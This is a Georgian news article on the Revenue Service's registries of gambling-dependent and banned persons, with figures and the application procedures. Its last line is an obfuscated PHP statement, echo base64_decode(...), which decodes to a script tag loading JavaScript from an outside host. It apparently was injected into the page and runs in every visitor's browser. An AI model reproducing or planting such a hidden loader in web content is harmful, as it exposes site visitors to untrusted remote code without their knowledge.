celsiusi
ავერსი საქკაბელი

 შემოსავლების სამსახურის ინფორმაციით, შემოსავლების სამსახურის მონაცემთა ბაზაში აზარტულ და მომგებიან თამაშობებზე დამოკიდებული 10 793 ფიზიკური პირია რეგისტრირებული.

„2022 წლის პირველი მარტიდან დღემდე, ფინანსთა სამინისტროს შემოსავლების სამსახურის მონაცემთა ბაზაში, დამოკიდებულ პირთა სიაში რეგისტრირებულია 10 793 ფიზიკური პირი, აქედან მოსამართლის ბრძანების საფუძველზე 40 პირი, ხოლო თავად პირის მომართვის საფუძველზე 10 753.

„ლატარიების, აზარტული და მომგებიანი თამაშობების მოწყობის შესახებ“ საქართველოს კანონის თანახმად, აკრძალულ პირთა სიაში დღეის მდგომარეობით, შეტანილია 1 475 075 პირის შესახებ ინფორმაცია. აქვე გაცნობებთ, რომ დამოკიდებულ პირთა სიაში საკუთარი მონაცემების შეტანის შესახებ განაცხადის წარდგენა შესაძლებელია როგორც მატერიალური ფორმით, ასევე ელექტრონულად – ავტორიზებული მომხმარებლის გვერდიდან – „დამოკიდებულ პირთა სიაში მონაცემის შეტანა“.

პირი თუ არ არის რეგისტრირებული შემოსავლების სამსახურის ვებგვერდზე – www.rs.ge,  მას შეუძლია, ონლაინფორმატში მიიღოს აღნიშნული მომსახურება videocall.rs.ge – ვებგვერდის საშუალებით. ვიდეოზარით რეგისტრაციის მომსახურების მიღება შესაძლებელია როგორც საკუთარი სახელით, ასევე მინდობილი პირის მეშვეობითაც, სამუშაო დღეების განმავლობაში – 09:00 საათიდან 18:00 საათამდე“, – აცხადებენ შემოსავლების სამსახურში.

შემოსავლების სამსახურის ინფორმაციით, დამოკიდებულ პირთა სიაში პირის შესახებ მონაცემები დაფიქსირდება მოსამართლის ბრძანების საფუძველზე, საქართველოს ადმინისტრაციული საპროცესო კოდექსის შესაბამისად. ოჯახის წევრს უფლება აქვს („ლატარიების, აზარტული და მომგებიანი თამაშობების მოწყობის შესახებ“ საქართველოს კანონის შესაბამისად) განცხადებით მიმართოს სასამართლოს პირის შესახებ მონაცემების დამოკიდებულ პირთა სიაში შეტანის თაობაზე და აღნიშნული მოთხოვნა გათავისუფლებულია სახელმწიფო ბაჟისგან.

„პირის მონაცემების აკრძალულ პირთა სიაში ასახვის გარემოებების გარკვევის მიზნით, გთხოვთ, მიმართოთ შემოსავლების სამსახურის მოქალაქეთა მომსახურების სერვისცენტრებს. ამასთან, აზარტული ან/და მომგებიანი თამაშობების (გარდა წამახალისებელი გათამაშებისა) სისტემურ-ელექტრონული ფორმით მომწყობებს შესაძლებლობა აქვთ, თავად გადაამოწმონ ამ სიაში ფიზიკური პირის არსებობა შემოსავლების სამსახურის გადამხდელის პორტალიდან ჩანართით – „სათამაშო ბიზნესი“, – წერია უწყების მიერ გავრცელებულ ინფორმაციაში.

შეგახსენებთ, დამოკიდებულ პირთა და აკრძალულ პირთა რეესტრს აწარმოებს შემოსავლების სამსახური. დამოკიდებულ პირთა სიასა და აკრძალულ პირთა სიაში დასაშვებია მხოლოდ საქართველოს მოქალაქის შესახებ მონაცემების შეტანა.

266
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");